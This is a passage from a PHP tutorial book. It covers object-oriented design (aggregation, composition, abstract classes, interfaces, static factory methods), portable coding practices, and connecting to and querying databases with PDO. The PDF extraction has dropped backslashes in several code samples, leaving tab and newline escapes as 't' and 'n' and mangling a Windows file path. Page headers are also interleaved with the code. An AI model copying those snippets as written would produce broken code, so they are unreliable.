can use another object to perform a function either by creating the object to be used
to perform the function or by receiving it through a method’s arguments. Such in­
teractions demonstrate the expressive power of the object oriented paradigm.

There are two ways in which one object can use another: aggregation and composi­
tion.

Aggregation
Aggregation occurs when one object is given another object on a “temporary loan.”
The second object will usually be passed to the first through one of the first object’s
methods—for instance, the constructor. The first object is then able to call methods
in the second, which means it can use the functionality stored in the second object
for its own purposes.

Let’s look at an example of aggregation in action. We’ll build an HTMLUnorderedList
class that can hold an array of HTMLListItem objects. The HTMLListItem class is a
simple extension of the parent HTMLElement class:

                                                        HTMLListItem.class.php (excerpt)

 <?php
 require_once 'HTMLElement.class.php';
 class HTMLListItem extends HTMLElement
 {
   protected $tagname = 'li';
24   The PHP Anthology


        public function __construct($content, $attributes = array())

        {

          parent::__construct($content, $attributes);

        }

      }

      ?>




     The HTMLUnorderedList class, however, has a new property and method:

                                                     HTMLUnorderdList.class.php (excerpt)

      <?php
      require_once 'HTMLListItem.class.php';
      class HTMLUnorderedList extends HTMLElement
      {
        ⋮ other properties…
        private $items = array();

        ⋮ constructor method…

        public function addListItem(HTMLListItem $item)
        {
          $this->items[] = $item;
        }

        public function getSource()
        {
          if (count($this->items)) {
            $this->content = '';
            foreach ($this->items as $item)
            {
              $this->content .= $item->getSource();
            }
          }
          return parent::getSource();
        }
      }
      ?>



     The addListItem method takes an HTMLListItem object as an argument and adds
     it to the array of list items stored in the $items property. The getSource method
Introduction    25

has also been overridden to be able to construct the HTML list element using the
list items.


       Type Hinting Demystified
      As you can see, I used type hinting in the addListItem method. A type hint is
      a specification that an argument for a method must be an object of a specified
      class. If the script doesn’t pass the constructor an object of the specified type, it
      will cause a fatal error (or, as of PHP 5.2, a recoverable error) to be raised. In the
      example function addListItem(HTMLListItem $item) will require the
      script to pass the constructor an HTMLListItem object.

      Type hinting can also be applied to object interfaces, which we discuss in the
      section called “Object Interfaces”. The convention in PHP programming is, in fact,
      to only type hint interfaces, not concrete class implementations. However, we can
      be forgiven for doing so in our simple OOP introduction.


Composition
Composition describes the style of object oriented programming where one object
completely owns another object—that is, the first object was responsible for instan­
tiating the second object. There are many cases in which composition can be useful,
although it’s most commonly used when it’s likely that the first object will be the
only one that needs to use the second.

For example, let’s create a class to represent a web site logo graphic. We want the
class to be able to output the HTML for the logo image, and to do that, it uses our
HTMLImage class like so:

                                                               WebsiteLogo.class.php (excerpt)

 <?php
 require_once 'HTMLImage.class.php';
 class WebsiteLogo
 {
   private $img;
   public function __construct($imagesrc, $title, $alt)
   {
     $this->img = new HTMLImage('',array('src' => $imagesrc,
         'title' => $title,
         'alt' => $alt,
         'class' => 'sitelogo'));
26   The PHP Anthology


        }


        public function getSource()

        {

          return $this->img->getSource();

        }


        public function __toString()

        {

          return $this->getSource();

        }

      }

      ?>




     Since the HTMLImage class already knows how to write the HTML for the image tag,
     we can use an instance of HTMLImage and just supply the correct image source, title,
     and alternative text for our web site logo graphic. We are also able to enforce the
     output of a specific class name in our web site logo <img> tag. When the
     WebsiteLogo->getSource method is called, it just calls the getSource method for
     the HTMLImage object.

     Using Aggregation and Composition: Benefits and Pitfalls
     In terms of practical development, it’s important to know when to apply aggregation
     or composition. How can you tell when object A should aggregate or compose object
     B? Ask yourself, “What happens if object A dies? Will object B still be alive?” If
     object B is required to outlive the death of object A, object A should aggregate object
     B. But if it’s better that object B dies when object A dies, then object A should
     compose object B.

     Aggregation offers the advantage of lower overhead than composition, because a
     single object will be shared by many other objects. It’s certainly a good idea to ag­
     gregate your database connection class; composing it with every object that wants
     to make a query may result in multiple connections to your database, which will
     cause your application to grind to a halt whenever it attracts high levels of traffic.

     Composition makes classes easier to work with because they’re self-contained. The
     code that uses the class doesn’t have to worry about passing it the other objects it
     needs, which, in a complex application, can often become so tricky as to require us
     to develop a design workaround. Another advantage of composition is that, when
Introduction     27

working with code that uses it, we know exactly which class has access to the
composed object.

One of the problems with aggregation is that an object which shares the aggregated
object may do something to its state that makes the object unusable by the other
classes that are supposed to be able to use it.

Composition produces tighter coupling—that is, greater dependency—between the
two objects involved, making it more difficult to reuse one without the other.

Polymorphism
Another powerful aspect of object oriented programming is polymorphism—the
ability of different objects to share an interface and thus become interchangeable.

An interface is the name given to one or more methods that let you use a class for
a particular purpose. For example, imagine you have two database connection
classes—one for MySQL, and one for PostgreSQL. As long as both of them offered
a query method, you could use them interchangeably for running queries on different
databases—of course, your SQL would have to be valid in both databases. In this
case, the query method would represent a simple interface that the two classes
shared.

Classes sharing the same interface are often inherited from a parent class that makes
the common methods available, or implements a common interface. This concept
is best illustrated by the following examples.

Abstract Classes and Methods
Our parent class, HTMLElement contains all the common functionality for all our
child classes. However, we don’t really want to be able to instantiate an object from
the HTMLElement class—it has no tag name information and wouldn’t output any
useful HTML. So we use the abstract keyword to make this an abstract base class,
which provides an outline of the minimum functionality required for an HTMLElement
object: the common getSource and getAttributeSource methods. We extend the
HTMLElement class to define concrete child classes, each of which creates a specific
approach to building an HTML element:
28   The PHP Anthology

                                                      AbstractHTMLElement.class.php (excerpt)

      <?php
      abstract class HTMLElement
      {
        ⋮ common properties and methods…
      }
      ?>



     The terms abstract and concrete refer to class usage—in particular, whether a class
     is intended to be used directly or not.

     An abstract class is one that has some functionality or structure that’s to be shared
     by all subclasses, though the class itself can’t be used directly. In other words, we’re
     not supposed to create objects from an abstract class. If we try to do so, we’ll raise
     a fatal error. A concrete class is a subclass of the abstract class from which we can
     create objects.

     There are more ways to use the abstract keyword than just at the class level.
     Typically, an abstract class also has one or more empty methods that don’t do any­
     thing other than demand that given child classes implement them. For example,
     we could add a hypothetical method called addContent; we only include the
     method name and parameters:

                                                      AbstractHTMLElement.class.php (excerpt)

      <?php
      abstract class HTMLElement
      {
        ⋮ common properties and methods…
        abstract public function addContent(HTMLElement $element);
      }
      ?>



     Defining abstract method in this way allows the author of the abstract class to indic­
     ate the intention of the class without dictating the implementation. In this example
     the abstract addContent method must accept a single argument containing a
     HTMLElement object. The inclusion of this abstract method makes it compulsory for
     any child classes to implement the method. While the intention of this abstract
     method may be to force any HTMLElement object to add a child HTML element to
Introduction     29

its inner content, each HTML element achieves this in different ways. For example,
some HTML elements can only contain child elements of a certain type; others can’t
contain any child elements at all. If you’re curious to learn some more about abstrac­
tion, check out the manual page.22

Object Interfaces
An object interface is the equivalent of an agreement to implement certain methods.
It differs from an abstract class in that it contains no implementation at all. Interfaces
are defined by the interface keyword; they’re written in the same way as classes,
except that the methods have no contents at all. Here’s an example of an interface:

                                                               HTMLSource.interface.php (excerpt)

 <?php
 interface HTMLSource
 {
   public function getSource();
 }
 ?>



This is a very simple interface but it’ll do for an example. Here, we’ve defined one
method: getSource. Any class that implements this interface must implement this
method; failure to do so will raise a fatal error. As the intention of interfaces is to
define a public interface, all methods must be declared public. Our intention with
the interface above is to indicate which objects can output an HTML source string.

To indicate that a class implements a specific interface, you use the implements
keyword. Here’s an example of this usage in a modification of our previously defined
WebsiteLogo class:

                                                                 WebsiteLogo2.class.php (excerpt)

 <?php
 require_once 'HTMLImage.class.php';
 require_once 'HTMLSource.interface.php';

 class WebsiteLogo implements HTMLSource
 {


22
     http://www.php.net/manual/en/language.oop5.abstract.php
30   The PHP Anthology


        ⋮ class properties and methods…

        public function getSource()

        {

          return $this->img->getSource();

        }

      }

      ?>




     You may be wondering, “So what’s the big deal?” Well, let’s finish off our explana­
     tion of object interfaces by examining a situation where interfaces will come in
     handy. Let’s say for the purposes of this demonstration that the abstract HTMLElement
     class also implements the HTMLSource interface. It already does so by virtue of the
     fact that it has a method called getSource, but indicating the fact in code allows
     us to test it for sure. We’d indicate the implementation like this:

                                                   AbstractHTMLElement2.class.php (excerpt)

      <?php
      require_once 'HTMLSource.interface.php';
      abstract class HTMLElement implements HTMLSource
      {
        ⋮ common properties and methods…
      }
      ?>



     To make use of this new feature of our codebase, let’s change the base class imple­
     mentation of the getSource method:

                                                   AbstractHTMLElement2.class.php (excerpt)

        public function getSource()
        {
          if ($this->content instanceof HTMLSource)
          {
            $html = $this->content->getSource();
          }
          else
          {
            $html = $this->content;
          }
Introduction       31



         return '<' . $this->tagname . 

             $this->getAttributeSource() . '>' .

             $html . 

             '</' . $this->tagname . '>';

       }




With this modified function, any object based on the HTMLElement class can now
have as its content any object that implements the HTMLSource interface. This could
be an object based on any one of our HTMLElement classes previously defined, or
even an object based on the WebsiteLogo class. When getSource is called, the in­
stanceof type operator is used to check the type of the content property—if it’s an
object that implements the interface, we call its getSource method; otherwise, we
assume it’s a string value and use that. The operator allows us to check that an object
implements the interface, allowing us to make use of it without having to know
exactly what kind of object it is.23

Static Properties and Methods
Static properties and methods are different than object properties and methods in
the way that they allow a property or method to be accessed without the instantiation
of an object. This feature is particularly handy at times when you want to use a
method of a class without having to instantiate an object to do so.

Let’s take a closer look at how static properties work. Since having to type in new
HTMLParagraph(…) whenever we wish to create a paragraph is slightly tedious, we’ll
want to make it easier. Let’s make a class called HTML—which we can use without
having to instantiate any objects—to create our objects for us.24 We use the static
keyword to indicate that the methods are static:




23
     You can read more about interfaces here: http://www.php.net/manual/en/language.oop5.interfaces.php
and more about the instanceof operator here:
http://www.php.net/manual/en/language.operators.type.php
24
   This is an example of the Factory design pattern. Read more about patterns on the manual page at
http://www.php.net/manual/en/language.oop5.patterns.php.
32   The PHP Anthology

                                                                               HTML.class.php

      <?php
      require_once 'HTMLParagraph.class.php';

      class HTML
      {
        public static function p($content, $attributes = array()) {
          return new HTMLParagraph($content, $attributes);
        }
      }
      ?>



     Here’s an example of how the HTML class could be used:

      echo HTML::p('This is a static method!');



     This example would output as follows:

      <p>This is a static method!</p>



     Notice that when we use a static method, we use the :: operator, rather than the
     object -> operator, to access the method. You may have noticed that this is the same
     operator used to call a method of the parent class of the current object, as in
     parent::method(). The parent class usage is a special case where inheritance is
     concerned, as the parent class method retains access to the object’s instance data,
     and therefore isn’t static.


            $this Can’t be Used in Static Methods
           As static methods are used without the instantiation of an object, the $this
           variable can’t be used in static methods.


     Now to extend this example a bit—and possibly to excite your interest in OOP in
     PHP 5 into the bargain—imagine for a moment that we’ve added a static method
     and a corresponding class for each possible HTML element to our HTML class. Re­
     membering that one HTMLElement object can be passed to the constructor of another
     HTMLElement object as its content, we can now create methods for all HTML elements
     that we can use as demonstrated in the following example:
Introduction     33


 echo HTML::div(HTML::h1('Welcome to my web site!'),

     array('id' => 'header'));



This example would output the following HTML:

 <div id="header"><h1>Welcome to my web site!</h1></div>



Taking the above example as your goal, I’ll leave the implementation of such an
API up to you. Come on—with this introduction to OOP under your belt, it should
be easy!


How do I write portable PHP code?
Not all PHP installations are the same. Depending on version and configuration
settings in your php.ini file, your script may or may not run correctly on another
server on which PHP is installed. However, you should consider adopting a number
of generally accepted best practices to make life easier and minimize the need to
rewrite code for other servers.

Solution
The list of generally accepted best practices include, keeping your configuration
central, writing your code to be reusable, always using the full PHP tags, always
using supergobal variables and never using register_globals and always checking
for magic quotes.

Keeping Configuration Central
For most PHP applications, it will be necessary to write configuration information
describing the environment in which the script will run, including database user-
names and passwords, directory locations, and so on. As a general rule, try to keep
the majority of this information in a single place—maybe even a single file—so that
when you need to modify the information, you can make all the necessary changes
in one place. That said, when you’re building modular applications, you may want
to store local elements of the configuration to a specific module within the module
itself, rather than in a central location.

The way each of us chooses to store this information is a matter of personal choice.
In some cases, it may be worth considering the use of an XML file, or storing some
34   The PHP Anthology

     of the information in a database. It’s also worth being aware of the parse_ini_file
     function.25

     A simple but effective storage mechanism is to place all the settings into a single
     file as PHP constants, which makes them available from any function or class in
     your application. Here’s an example:

      <?php

      // Configuration settings

      define('DOMAIN', 'sitepoint.com');


      // In another script

      echo 'The domain is ' . DOMAIN;

      ?>



     Constants need to be used with caution, though. In order for your functions and
     classes to be reusable in other applications, they shouldn’t depend on constants of
     a fixed name; rather, they should accept configuration information as arguments—an
     approach that will allow for greater code reuse. In such cases, it’s best to use PHP
     variables in your central configuration file, which you can then pass to functions
     and classes as required.

     For example, when we’re connecting to database, we can identify a number of
     variables that we need to have stored in a central location: the server hostname, the
     username, and the password. We can use the require_once function to create a file
     called, for instance, config.php, and place it outside the public web directories.
     This approach helps to ensure that users don’t accidentally browse to the file con­
     taining this critical information—a situation that would place the site’s security at
     risk.

     Recycling and Reuse
     It’s easy to say, but if you find yourself writing any more than one PHP script in
     your life, you need to start thinking about ways to make your code reusable before
     you suffer premature hair loss!

     If you end up working on other sites or applications, you’ll appreciate having ready
     code that you can simply plug into your new project. Also, if you’re writing code


     25
          http://www.php.net/manual/en/function.parse-ini-file.php
Introduction     35

that other people will integrate with existing applications on their web sites, you
need to package it in a form that doesn’t place requirements on the code they’re
already using. For example, if your application has some kind of user authentication
system, you’ll want to ask yourself if it can be integrated with the systems that site
owners are already using—systems with which large databases of users are likely
already associated.

The best approach is to write object oriented code with a mind to creating reusable
components, or pieces of functionality. Some people argue that creating PHP applic­
ations using object oriented code results in slower-running applications and should
be avoided at all costs. What they forget to mention is that object oriented program­
ming delivers a drastic increase in your code’s performance. After all, fast program­
mers cost more than fast microprocessors!

A number of important points must be considered when you’re measuring the po­
tential of your code for reuse:

■	 What happens when the project’s requirements change?
■	 How easy is it to add new features to your code?
■	 Are you still able to understand the code after a long period of time?
■	 Can your code be integrated easily with other applications?
■	 Will the assumptions you’ve made in your code apply to your work on other
   sites?

This book will provide many hints and suggestions to help you to write reusable
code, although an in-depth analysis of PHP applications design as a whole is beyond
its scope. As you read this book, you should be able to identify some of the critical
factors as subjects for further investigation. You have one main responsibility to
yourself as an experienced PHP developer: to keep expanding your knowledge of
the more esoteric aspects of software development, such as design patterns and
enterprise application architecture, as a means to improve your development tech­
nique and, more importantly, save yourself time. The broader your knowledge, the
lower the risk of failure when you land the next big project.

Portability Essentials
Here are three steps you should take to ensure the portability of your PHP code.
36   The PHP Anthology

     Using the Full <?php ?> Tags
     PHP supports a variety of tag styles to mark up sections of your code, including the
     short tags (<? ?>), and ASP-style tags (<% %>). Tag style support is controlled from
     php.ini with the settings short_open_tag and asp_tags. Be aware, though, that
     while you may have these settings switched on, other server administrators may
     not, which can be problematic. The short tag style, for example, causes issues when
     the PHP is mixed with XML documents that use processing instructions like this:

      <?xml version="1.0"?>



     If you have a document that contains PHP and XML, and you have the
     short_open_tag setting turned on, PHP will mistake the XML processing instruction
     <?xml for a PHP opening tag.

     It’s possible that your code will need to run in environments where short_open_tags
     and asp_tags are both turned off. The best way to ensure that these settings are
     disabled is to get into the habit of always using the <?php ?> tag style—otherwise,
     you may have a lot of code rewriting to do in the future.

     Turning register_globals Off
     Make sure the following code is in place in your php.ini file:

      register_globals = off



     This will force you to access incoming data via the special predefined superglobal
     variables (e.g. $_GET['username']), ensuring there won’t be a conflict with variables
     you’ve created in your script.

     The same result can be achieved by placing the following code in your Apache
     .htaccess file:


      php_flag register_globals off



     Further information can be found in The PHP Manual,26 and in Kevin Yank’s article,
     Write Secure Scripts with PHP 4.2! on SitePoint.27


     26
          http://www.php.net/manual/en/security.globals.php
     27
          http://www.sitepoint.com/article/write-secure-scripts-php-4-2/
Introduction       37

Checking for Magic Quotes
Magic quotes is a feature of PHP that’s intended to help prevent security breaches
in sites developed by PHP beginners.

The magic quotes feature adds escape characters —backslashes that indicate that
quotation marks should be included in the string, rather than marking the end of
the string—to incoming URL query strings, form posts, and cookie data automatically,
before your script is able to access any of these values. Should you insert the data
directly into your database, there’s no risk that a malicious user might be able to
tamper with the database provided magic quotes functionality is switched on.

For beginners, this is certainly a useful way to prevent disasters. However, once
you understand what SQL injection attacks are, and have developed the habit of
writing code to avoid them,28 the magic quotes functionality can become more of
a problem than it’s worth.

Magic quotes functionality is controlled by a PHP configuration setting
magic_quotes_gpc , which can be set to be either on or off.

My own preference is always to have magic quotes switched off, and to deal with
the task of escaping data for SQL statements myself. Unfortunately, this means that
the code I write won’t port well to PHP installations where magic quotes is switched
on—I’ll end up with backslashes in my content. Thankfully, to deal with this
problem, PHP provides the function get_magic_quotes_gpc , which can be used
to find out whether the magic quotes functionality is switched on. To keep the code
in this book portable, we’ll use a simple file that strips out magic quotes, should
this functionality be enabled:




28
   See “How do I protect my web site from an SQL injection attack?” in Chapter 2 for more on SQL in­
jection attacks.
38   The PHP Anthology


      <?php

      /**

       * Checks for magic_quotes_gpc = On and strips them from incoming

       * requests if necessary

       */

      if (get_magic_quotes_gpc()) {

        $_GET    = array_map('stripslashes', $_GET);

        $_POST   = array_map('stripslashes', $_POST);

        $_COOKIE = array_map('stripslashes', $_COOKIE);

      }

      ?>



     If we include this code at the start of any file in which we accept data from a query
     string, a form post, or a cookie, we’ll remove any slashes added by magic quotes,
     should this functionality be switched on.


     Summary
     Are you ready to jump in and try the PHP 5 waters? This chapter has showed you
     how to keep your head up and tread water. You may not be a professional swimmer
     yet, but with The PHP Manual by your side—as well as this book—we’ll keep you
     afloat, introduce you to some of the beauty of the PHP ocean, and eventually show
     you how to glide through the waters with grace!
2
                                                    Chapter




Using Databases with PDO
In the “old days” of the Internet, most web pages were nothing more than text files
containing HTML. When people visited your site, your web server simply made the
file available to their browsers. This approach started out fine, but as web sites grew,
and issues such as design and navigation became more important, developers found
that maintaining consistency across hundreds of HTML files was becoming a massive
headache. To solve this problem, it became popular to separate variable content
(articles, news items, and so on) from the static elements of the site—its design and
layout.

If a database is used as a repository to store variable content, a server-side language
such as PHP performs the task of fetching that data and placing it within a uniform
layout template. This means that modifying the look and feel of a site can be handled
as a separate task from the maintenance of content. And maintaining consistency
across all the pages in a web site no longer consumes a developer’s every waking
hour.

PHP supports all the relational databases worth mentioning, including those that
are commonly used in large companies: Oracle, IBM’s DB2, and Microsoft’s SQL
Server, to name a few. The three most noteworthy open source alternatives are
40   The PHP Anthology

     SQLite, PostgreSQL, and MySQL. PostgreSQL is arguably the best database of the
     three, in that it supports more of the features that are common to relational databases.
     SQLite is the perfect choice for smaller applications that still require database cap­
     ability. MySQL is a popular choice among web hosts that provide support for PHP,
     and for this reason is typically easier to find than PostgreSQL.

     This chapter covers all the common operations that PHP developers perform when
     working with databases: retrieving and modifying data, and searching and backing
     up the database. To achieve these tasks, we’ll use the built-in PDO extension, rather
     than database-specific extensions. The examples we’ll work with will use a single
     table, so no discussion is made of table relationships here. For a full discussion of
     that topic, see Kevin Yank’s Build Your Own Database Driven Website Using PHP
     & MySQL, 3rd Edition (SitePoint, Melbourne, 2006)1.

     The examples included here work with the MySQL sample database called “world,”
     though all the interactions we’ll work through can be undertaken with any database
     supported by PDO. The SQL file for the world database is available at
     http://dev.mysql.com/doc/#sampledb and the instructions explaining its use can
     be found at http://dev.mysql.com/doc/world-setup/en/world-setup.html.


     What is PDO?
     PDO, the PHP Data Objects extension, is a data-access abstraction layer. But what
     the heck is that? Basically, it’s a consistent interface for multiple databases. No
     longer will you have to use the mysql_* functions, the sqlite_* functions, or the
     pg_* functions, or write wrappers for them to work with your database. Instead,
     you can simply use the PDO interface to work with all three functions using the
     same methods. And, if you change databases, you’ll only have to change the DSN
     (or Data Source Name) of the PDO to make your code work.2

     PDO uses specific database drivers to interact with various databases, so you can’t
     use PDO by itself. You’ll need to enable the drivers you’ll use with PDO, so be sure




     1
       http://www.sitepoint.com/books/phpmysql1/

     2
       That’s all you’ll have to do so long as you write your SQL in a way that’s not database specific. If you

     try to stick to the ANSI 92 standard [http://www.contrib.andrew.cmu.edu/~shadow/sql/sql1992.txt],

     you should generally be okay—most databases support that syntax.
Using Databases with PDO       41

to research how to do it for your specific host operating system on the PDO manual
page.3

PDO is shipped with PHP 5.1 and is available from PECL for PHP 5.0. Unfortunately,
as PDO requires the new PHP 5 object oriented features, it’s not available for PHP
4. In this book, all of our interactions with the database will use PDO to interact
with the MySQL back end.


How do I access a database?
Before we can do anything with a database, we need to talk to it. And to talk to it,
we must make a database connection. Logical, isn’t it?

Solution
Here’s how we connect to a MySQL database on the localhost:

                                                          mysqlConnect.php (excerpt)

    <?php
    $dsn = 'mysql:host=localhost;dbname=world;';
    $user = 'user';
    $password = 'secret';
    try
    {
      $dbh = new PDO($dsn, $user, $password);
    }
    catch (PDOException $e)
    {
      echo 'Connection failed: ' . $e->getMessage();
    }
    ?>



We’d use this code to connect to a SQLite database on the localhost:




3
    http://www.php.net/pdo/
42   The PHP Anthology

                                                                           sqliteConnect.php (excerpt)

         <?php
         $dsn = 'sqlite2:"C:sqliteworld.db"';
         try
         {
           $dbh = new PDO($dsn);
         }
         catch (PDOException $e)
         {
           echo 'Connection failed: ' . $e->getMessage();
         }
         ?>



     And this code will let us connect to a PostgreSQL database on the localhost:

                                                                         postgreConnect.php (excerpt)

         <?php
         $dsn = 'pgsql:host=localhost port=5432 dbname=world user=user ';
         $dsn .= 'password=secret';
         try
         {
           $dbh = new PDO($dsn);
         }
         catch (PDOException $e)
         {
           echo 'Connection failed: ' . $e->getMessage();
         }
         ?>



     Discussion
     Notice that in all three examples above, we simply create a new PDO object. Only
     the connection data for the PDO constructor differs in each case: for the SQLite and
     PostgreSQL connections, we need just the DSN; the MySQL connection also requires
     username and password arguments in order to connect to the database.4



     4
       We could have put the username and password information in the MySQL DSN, providing a full DSN,
     but the average user has no cause to do this when using MySQL. It just adds unnecessary complexity to
     the DSN.
Using Databases with PDO   43

The DSN in Detail
As we saw above, DSN is an acronym for Data Source Name. The DSN provides the
information we need in order to connect to a database. The DSN for PDO has three
basic parts: the PDO driver name (such as mysql, sqlite, or pgsql), a colon, and
the driver-specific syntax. The only aspect that may be a bit confusing here is the
driver-specific syntax, as each driver requires different information. But have no
fear—the trusty manual is here, of course!

The manual describes the database driver-specific syntax that’s required in the DSN
for each of the PDO drivers. All you need to do is to go to the database driver page,5
select your database driver, and follow the link to the DSN information. For example,
the MySQL DSN page in the manual is found at
http://www.php.net/manual/en/ref.pdo-mysql.connection.php; it’s shown in Fig­
ure 2.1.




                               Figure 2.1. The PDO_MySQL DSN manual page




5
    http://www.php.net/manual/en/ref.pdo.php#pdo.drivers
44   The PHP Anthology

     DSN examples are also provided on each manual page to get you started.


            Do Not Pass Credentials in the DSN
           In the database connection examples we just saw, I included my access credentials
           within the DSN, or in the $user and $pass variables, but I did so for illustration
           purposes only. This is not standard—or appropriate—practice, since this inform­
           ation can by misused by malicious parties to access your database.


     Other Concepts
     There are several concepts that you should understand when working with a data­
     base. First, you need to remember that the database server is a completely separate
     entity from PHP. While in these examples the database server and the web server
     are the same machine, this is not always the case. So, if your database is on a different
     machine from your PHP, you’ll need to change the host name in the DSN to point
     to it.

     To make things more interesting, database servers only listen for your connection
     on a specific port number. Each database server has a default port number (MySQL’s
     is 3306, PostgreSQL’s is 5432), but that may not be the port that the database admin­
     istrator chose to set, or the one that PHP knows to look at. When in doubt, include
     your port number in the DSN.

     You also need to be aware that a database server can have more than one database
     on it, so yours may not be the only one. This is why the database name is commonly
     included in the DSN—to help you get to your data, not some other person’s!

     Finally, make sure you understand what you’ll receive from your PDO connection.
     Your connection will return a PDO object—not a reference to the database, or any
     data. It is through the PDO object that we interact with the database, bending it to
     our will.


     How do I fetch data from a table?
     Here we are, connected to the database. Woo hoo! But what good is that if we can’t
     get anything out of the database?
Using Databases with PDO       45


Solutions
PDO provides a couple of ways for us to interact with the database. Here, we’ll ex­
plore both possible solutions.

Using the Query Method
First, let’s look at the faster, but not necessarily better, way—using the query
method:

                                                               pdoQuery.php (excerpt)

 $country = 'USA';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'Select * from city where CountryCode =' .
       $dbh->quote($country);
   foreach ($dbh->query($sql) as $row)
   {
     print $row['Name'] . "t";
     print $row['CountryCode'] . "t";
     print $row['Population'] . "n";
   }
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }



An excerpt of this code’s output can be seen in Figure 2.2.
46   The PHP Anthology




                         Figure 2.2. Output produced using the PDO query method


     Using the Prepare and Execute Methods
     Using the prepare and execute methods is generally considered the better way to
     handle a query to the database. First, we call PDO->prepare with our SQL statement
     as an argument. In return, we receive a PDOStatement object, on which we call the
     execute method. Then, within a while loop, we repeatedly call the
     PDOStatement->fetch method to retrieve the data we’ve selected from our database:

                                                                            pdoPrepEx.php (excerpt)

      $country = 'USA';
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $sql = 'Select * from city where CountryCode =:country';
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':country', $country, PDO::PARAM_STR);
Using Databases with PDO   47


    $stmt->execute();

   while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {

      print $row['Name'] . "t";

      print $row['CountryCode'] . "t";

      print $row['Population'] . "n";

   }

 } 

 catch (PDOException $e)

 {

   echo 'PDO Exception Caught. ';

   echo 'Error with the database: <br />';

   echo 'SQL Query: ', $sql;

   echo 'Error: ' . $e->getMessage();

 }




An excerpt of the output of this code can be seen in Figure 2.3.




                  Figure 2.3. Output using the PDO prepare and execute methods
48   The PHP Anthology


     Discussion
     You’ll have noticed that both these solutions give you the same data, which is as it
     should be. But there are very specific reasons for choosing one solution over the
     other.

     PDO->query is great when you’re only executing a query once. While it doesn’t
     automatically escape any data you send it, it does have the very handy ability to
     iterate over the result set of a successful SELECT statement. However, you should
     take care when using this method. If you don’t fetch all the data in the result set,
     your next call to PDO->query might fail.6 If you’re going to use the SQL statement
     more than once, your best bet is to use prepare and execute—the preferred solution.
     Using prepare and execute has a couple of advantages over query. First, it will
     help to prevent SQL injection attacks by automatically escaping any argument you
     give it (this approach is often considered the better practice for this reason alone).
     Granted, if you build any other part of your query from user input, that will negate
     this advantage, but you wouldn’t ever do that, would you? Second, prepared state­
     ments that are used multiple times (for example, to perform multiple inserts or
     updates to a database) use fewer resources and will run faster than repeated calls
     to the query method.

     There are a couple of other ways we can use prepare and execute on a query, but
     I feel that the example we discussed here will be the clearest. I used named para­
     meters in this solution, but be aware that PDO also supports question mark (?)
     parameter markers. In the example we saw here, you could have chosen not to use
     the paramBind method—instead, you could have given the parameters to the execute
     command. See The PHP Manual if you have any questions about the alternative
     syntaxes.

     Using Fetch Choices
     When you use prepare and execute, you have the choice of a number of formats
     in which data can be returned. The example we saw used the PDO::FETCH_ASSOC




     6
      For further information, see The PHP Manual page at
     http://www.php.net/manual/en/function.PDO-query.php.
Using Databases with PDO             49

option with the fetch method, because it returns data in a format that will be very
familiar for PHP4 users: an associative array.7

If you’d rather use only object-oriented code in your application, you could instead
employ the fetchObject method, which, as the name implies, returns the result
set as an object. Here’s how the while loop will look when the fetchObject method
is used:

                                                                           pdoPrepEx2.php (excerpt)

    while ($row = $stmt->fetchObject())
    {
      print $row->Name . "t";
      print $row->CountryCode . "t";
      print $row->Population . "n";
    }




How do I resolve errors in my SQL queries?
Errors are inevitable. They assail all of us and can, at times, be caused by circum­
stances outside our control—database crashes, database upgrades, downtime for
maintenance, and so on. If something goes wrong when you’re trying to deal with
PHP and SQL together, it’s often difficult to find the cause. The trick is to get PHP
to tell you where the problem is, bearing in mind that you must be able to hide this
information from visitors when the site goes live.


           We’re Only Looking for Errors—Not Fixing Them!
         I won’t be explaining error handling in depth here—instead, I’ll show you how
         to find errors. See Chapter 9 for more information on what to do when you’ve
         found an error and want to fix it.


Solutions
PDO provides multiple solutions for catching errors. We’ll go over all three options
in the following examples, where we’ll introduce a typo into the world database


7
    For a full listing of the ways in which you can have data returned, see the fetch page of the manual
at http://www.php.net/manual/en/function.pdostatement-fetch.php.
50   The PHP Anthology

     table name, so that it reads cities instead of city. If you run this code yourself,
     you can also try commenting out the error-handling code to see what may be dis­
     played to site visitors.

     Using Silent Mode
     PDO::ERRMODE_SILENT is the default mode:

                                                                  pdoError1.php (excerpt)

      $country = 'USA';
      $dbh = new PDO($dsn, $user, $password);
      $sql = 'Select * from cities where CountryCode =:country';
      $stmt = $dbh->prepare($sql);
      $stmt->bindParam(':country', $country, PDO::PARAM_STR);
      $stmt->execute();
      $code = $stmt->errorCode();
      if (empty($code))
      {
        ⋮ proceed to fetch data
      }
      else
      {
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo '<pre>';
        var_dump($stmt->errorInfo());
        echo '</pre>';
      }



     The default error mode sets the errorCode property of the PDOStatement object,
     but does nothing else. As you can see in this example, you need to check the error
     code manually to ascertain whether or not an error was found—otherwise your
     script will happily continue on its merry way.

     Using Warning Mode
     PDO::ERRMODE_WARNING generates a PHP warning as well as setting the errorCode
     property:
Using Databases with PDO        51

                                                             pdoError2.php (excerpt)

 $country = 'USA';
 $dbh = new PDO($dsn, $user, $password);
 $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING);
 $sql = 'Select * from cities where CountryCode =:country';
 $stmt = $dbh->prepare($sql);
 $stmt->bindParam(':country', $country, PDO::PARAM_STR);
 $stmt->execute();
 $code = $stmt->errorCode();
 if (empty($code))
 {
   ⋮ proceed to fetch data
 }
 else
 {
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo '<pre>';
   var_dump($stmt->errorInfo());
   echo '</pre>';
 }



Again, the program will continue on its merry way unless you specifically check
for the error code. So, unless you have the Display Errors functionality turned on,
